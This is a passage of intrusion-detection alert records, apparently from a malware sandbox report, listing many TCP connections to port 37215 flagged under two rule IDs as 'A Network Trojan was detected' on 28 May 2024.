            SID:2829579
            Source Port:40660
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:34.432488
            SID:2829579
            Source Port:56746
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.777011
            SID:2829579
            Source Port:50032
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.278105
            SID:2835222
            Source Port:49276
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.808122
            SID:2829579
            Source Port:56380
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.834486
            SID:2835222
            Source Port:51918
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.887452
            SID:2829579
            Source Port:51960
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.824814
            SID:2835222
            Source Port:38842
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:00.730951
            SID:2829579
            Source Port:58738
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.922175
            SID:2835222
            Source Port:54398
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.031606
            SID:2835222
            Source Port:43598
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.772604
            SID:2835222
            Source Port:39490
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.071752
            SID:2835222
            Source Port:32816
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.553269
            SID:2835222
            Source Port:46124
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.870284
            SID:2829579
            Source Port:52492
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:24.190192
            SID:2835222
            Source Port:50022
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.954707
            SID:2835222
            Source Port:54952
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.849734
            SID:2835222
            Source Port:55068
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.084774
            SID:2829579
            Source Port:45392
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.065469
            SID:2829579
            Source Port:38690
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:56.721609
            SID:2835222
            Source Port:59790
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:50.596896
            SID:2829579
            Source Port:42676
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.860518
            SID:2829579
            Source Port:50978
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:53.669917
            SID:2835222
            Source Port:50468
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.958489
            SID:2829579
            Source Port:45474
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.026811
            SID:2829579
            Source Port:52342
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.515636
            SID:2829579
            Source Port:42994
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:41.543457
            SID:2829579
            Source Port:41464
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.984492
            SID:2835222
            Source Port:40990
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.943706
            SID:2829579
            Source Port:47610
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.817421
            SID:2829579
            Source Port:44468
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.929986
            SID:2835222
            Source Port:43660
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.385873
            SID:2829579
            Source Port:48592
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:16.999901
            SID:2835222
            Source Port:56836
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.510886
            SID:2829579
            Source Port:42906
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.851058
            SID:2829579
            Source Port:34400
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.909955
            SID:2829579
            Source Port:42562
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.597407
            SID:2829579
            Source Port:33044
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.290440
            SID:2835222
            Source Port:33470
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.786632
            SID:2835222
            Source Port:60810
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:43.524477
            SID:2829579
            Source Port:58078
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.067477
            SID:2829579
            Source Port:51198
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.710079
            SID:2835222
            Source Port:38314
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.777848
            SID:2835222
            Source Port:56200
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.495246
            SID:2835222
            Source Port:36778
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.762116
            SID:2829579
            Source Port:60544
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.997850
            SID:2829579
            Source Port:55442
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:57.738753
            SID:2829579
            Source Port:46258
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.772971
            SID:2835222
            Source Port:33188
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.774004
            SID:2835222
            Source Port:57322
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.507900
            SID:2829579
            Source Port:35230
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.953000
            SID:2829579
            Source Port:55396
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.856383
            SID:2829579
            Source Port:58510
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:01.760111
            SID:2835222
            Source Port:52760
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:20.064682
            SID:2835222
            Source Port:50180
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.056809
            SID:2835222
            Source Port:51758
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.891625
            SID:2829579
            Source Port:33882
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:14.979560
            SID:2835222
            Source Port:56122
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:50.627861
            SID:2829579
            Source Port:48730
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:56.715545
            SID:2829579
            Source Port:33194
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.764648
            SID:2835222
            Source Port:50050
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:26.282696
            SID:2829579
            Source Port:54230
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:29.317132
            SID:2835222
            Source Port:59504
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:51.610806
            SID:2829579
            Source Port:44970
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.493603
            SID:2829579
            Source Port:57532
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.386267
            SID:2829579
            Source Port:59306
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.344108
            SID:2835222
            Source Port:47390
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.881823
            SID:2835222
            Source Port:44690
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.968359
            SID:2829579
            Source Port:33624
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.450818
            SID:2829579
            Source Port:33834
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.823301
            SID:2829579
            Source Port:39232
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:38.492905
            SID:2829579
            Source Port:50932
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.777631
            SID:2835222
            Source Port:58664
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:03.805254
            SID:2829579
            Source Port:45358
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.776912
            SID:2835222
            Source Port:47920
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.994128
            SID:2829579
            Source Port:51248
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:49.661917
            SID:2829579
            Source Port:34054
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.969174
            SID:2829579
            Source Port:39598
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.989602
            SID:2829579
            Source Port:58126
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:13.923613
            SID:2829579
            Source Port:38058
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.067775
            SID:2829579
            Source Port:53540
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:47.601762
            SID:2835222
            Source Port:33078
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.776339
            SID:2835222
            Source Port:58266
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.858013
            SID:2829579
            Source Port:38810
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.780244
            SID:2829579
            Source Port:48140
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.776741
            SID:2835222
            Source Port:50418
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.985307
            SID:2829579
            Source Port:60080
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.070180
            SID:2835222
            Source Port:54874
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.857891
            SID:2829579
            Source Port:37142
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:39.517542
            SID:2835222
            Source Port:44036
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:26.152999
            SID:2835222
            Source Port:57840
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.067703
            SID:2829579
            Source Port:54474
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.935945
            SID:2835222
            Source Port:38516
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.932079
            SID:2835222
            Source Port:48604
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.933781
            SID:2835222
            Source Port:47980
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.546154
            SID:2835222
            Source Port:43586
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:04.848869
            SID:2835222
            Source Port:54296
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:36.445663
            SID:2829579
            Source Port:36992
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.810840
            SID:2829579
            Source Port:48348
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:00.730898
            SID:2835222
            Source Port:55200
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.817724
            SID:2835222
            Source Port:46464
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:51.610127
            SID:2829579
            Source Port:58430
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.902128
            SID:2829579
            Source Port:38072
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.808314
            SID:2829579
            Source Port:46928
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:52.644118
            SID:2829579
            Source Port:59760
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.773920
            SID:2829579
            Source Port:51486
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.584630
            SID:2835222
            Source Port:34208
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.821831
            SID:2835222
            Source Port:37550
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.716189
            SID:2829579
            Source Port:60982
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.809146
            SID:2829579
            Source Port:43678
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:17.011177
            SID:2829579
            Source Port:49596
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:36.431283
            SID:2835222
            Source Port:42758
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.939279
            SID:2829579
            Source Port:46832
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.047646
            SID:2829579
            Source Port:36480
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.395200
            SID:2835222
            Source Port:43636
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:39.470171
            SID:2829579
            Source Port:48680
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.055971
            SID:2835222
            Source Port:52340
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.052554
            SID:2835222
            Source Port:33378
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:09.983638
            SID:2829579
            Source Port:50830
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:57.697894
            SID:2835222
            Source Port:39158
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.868723
            SID:2835222
            Source Port:48916
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.746115
            SID:2829579
            Source Port:60884
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.924672
            SID:2829579
            Source Port:51002
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.809058
            SID:2829579
            Source Port:60744
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.261878
            SID:2829579
            Source Port:57160
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.278434
            SID:2829579
            Source Port:58986
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:17.000135
            SID:2829579
            Source Port:45226
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.840855
            SID:2835222
            Source Port:36316
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.078510
            SID:2829579
            Source Port:39984
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:28.367517
            SID:2835222
            Source Port:46086
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.054921
            SID:2835222
            Source Port:34944
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.856295
            SID:2835222
            Source Port:46752
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.005344
            SID:2829579
            Source Port:44290
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.881967
            SID:2829579
            Source Port:49494
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.761135
            SID:2835222
            Source Port:48222
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.869248
            SID:2829579
            Source Port:49344
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.968848
            SID:2829579
            Source Port:39566
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:57.734178
            SID:2835222
            Source Port:33016
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:47.601825
            SID:2829579
            Source Port:40468
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:29.182219
            SID:2835222
            Source Port:53118
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.825888
            SID:2829579
            Source Port:39900
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.295984
            SID:2829579
            Source Port:33362
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:19.019274
            SID:2835222
            Source Port:38406
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.939212
            SID:2829579
            Source Port:43562
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.825383
            SID:2829579
            Source Port:47756
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.934073
            SID:2835222
            Source Port:39610
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.556258
            SID:2829579
            Source Port:40762
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.983870
            SID:2829579
            Source Port:57146
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.303662
            SID:2829579
            Source Port:50112
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.818108
            SID:2829579
            Source Port:46040
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.541606
            SID:2829579
            Source Port:33544
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:00.737941
            SID:2829579
            Source Port:58518
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.735767
            SID:2835222
            Source Port:47764
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:23.180732
            SID:2829579
            Source Port:54918
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:50.564900
            SID:2829579
            Source Port:57990
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:56.751536
            SID:2829579
            Source Port:44442
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.815089
            SID:2835222
            Source Port:44974
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.016356
            SID:2829579
            Source Port:42558
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.776878
            SID:2835222
            Source Port:54360
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:12.899680
            SID:2835222
            Source Port:49514
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.026517
            SID:2829579
            Source Port:39164
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:08.929939
            SID:2835222
            Source Port:46442
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.304193
            SID:2829579
            Source Port:37026
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.068306
            SID:2829579
            Source Port:43506
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.896811
            SID:2829579
            Source Port:37096
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.825355
            SID:2835222
            Source Port:59554
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.507880
            SID:2829579
            Source Port:60386
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.918301
            SID:2829579
            Source Port:53912
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.507460
            SID:2829579
            Source Port:51324
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:37.470772
            SID:2829579
            Source Port:58664
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.541369
            SID:2835222
            Source Port:39914
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.953665
            SID:2829579
            Source Port:44394
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.543372
            SID:2835222
            Source Port:53704
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:32.414298
            SID:2835222
            Source Port:40480
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.507172
            SID:2829579
            Source Port:51024
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.931943
            SID:2829579
            Source Port:46308
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:09.877547
            SID:2835222
            Source Port:58324
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:53.669786
            SID:2835222
            Source Port:60548
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.893915
            SID:2835222
            Source Port:39066
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.904024
            SID:2835222
            Source Port:42772
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.928228
            SID:2829579
            Source Port:48146
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.066929
            SID:2835222
            Source Port:38602
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:19.041164
            SID:2829579
            Source Port:55200
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.482918
            SID:2835222
            Source Port:54888
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:49.604913
            SID:2835222
            Source Port:55772
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:04.843912
            SID:2835222
            Source Port:52320
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:00.736680
            SID:2835222
            Source Port:42804
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.885248
            SID:2835222
            Source Port:33218
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:30.012108
            SID:2829579
            Source Port:35258
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.810887
            SID:2835222
            Source Port:45582
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:08.927299
            SID:2829579
            Source Port:36952
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.952221
            SID:2829579
            Source Port:39060
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:22.067546
            SID:2835222
            Source Port:56270
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.802110
            SID:2835222
            Source Port:53176
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.879585
            SID:2835222
            Source Port:47280
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.038378
            SID:2829579
            Source Port:37346
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:57.733651
            SID:2829579
            Source Port:58882
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:57.739682
            SID:2829579
            Source Port:55150
            Destination Port:37215
